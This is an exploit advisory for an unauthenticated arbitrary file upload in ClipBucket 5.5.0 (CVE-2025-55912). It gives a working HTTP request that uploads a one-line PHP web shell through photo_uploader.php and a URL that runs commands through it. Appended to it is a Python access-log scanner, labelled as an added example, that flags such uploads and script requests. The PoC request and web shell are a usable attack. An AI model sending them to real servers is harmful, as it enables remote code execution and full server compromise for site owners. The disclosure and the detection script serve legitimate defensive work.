# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: <= 5.5.0
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55912

## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).

## PoC Request:
```http
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--
```
The file is uploaded without authentication. The attacker can then access
it:

http://victim.com/files/photos/shell.php?cmd=id
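
The upload and the follow-up request described above both leave traces in the web server access log. The Python script below is an added example, not part of the original advisory or of the ClipBucket code base; it assumes common/combined-format access logs, and the function name, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

UPLOAD_ENDPOINT = "/upload/actions/photo_uploader.php"  # path from the advisory
PHOTO_DIR = "/files/photos/"                            # path from the advisory
# Assumption: extensions that a typical PHP handler mapping may execute.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Common/combined log prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Sep/2025:10:00:01 +0000] "GET /files/photos/2025/09/11/cat.jpg HTTP/1.1" 200 51234',
    '203.0.113.9 - - [11/Sep/2025:10:02:13 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 200 87',
    '203.0.113.9 - - [11/Sep/2025:10:02:20 +0000] "GET /files/photos/shell.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [11/Sep/2025:10:05:00 +0000] "GET /files/photos/old.PHTML HTTP/1.1" 404 0',
]

def find_suspicious(lines):
    """Return (kind, ip, path) tuples for log entries matching the advisory."""
    uploaders = set()  # clients whose POST to the uploader was not rejected
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = unquote(urlsplit(m["target"]).path)
        if method == "POST" and path == UPLOAD_ENDPOINT and status < 400:
            # Access logs carry no session state, so every accepted upload
            # is listed for review against known, logged-in uploaders.
            uploaders.add(ip)
            findings.append(("upload", ip, path))
        elif path.startswith(PHOTO_DIR) and SCRIPT_EXT.search(path):
            # No photo should have a script extension; flag any request,
            # with higher priority if the same client uploaded earlier.
            kind = "script-hit-after-upload" if ip in uploaders else "script-hit"
            findings.append((kind, ip, path))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```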

## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server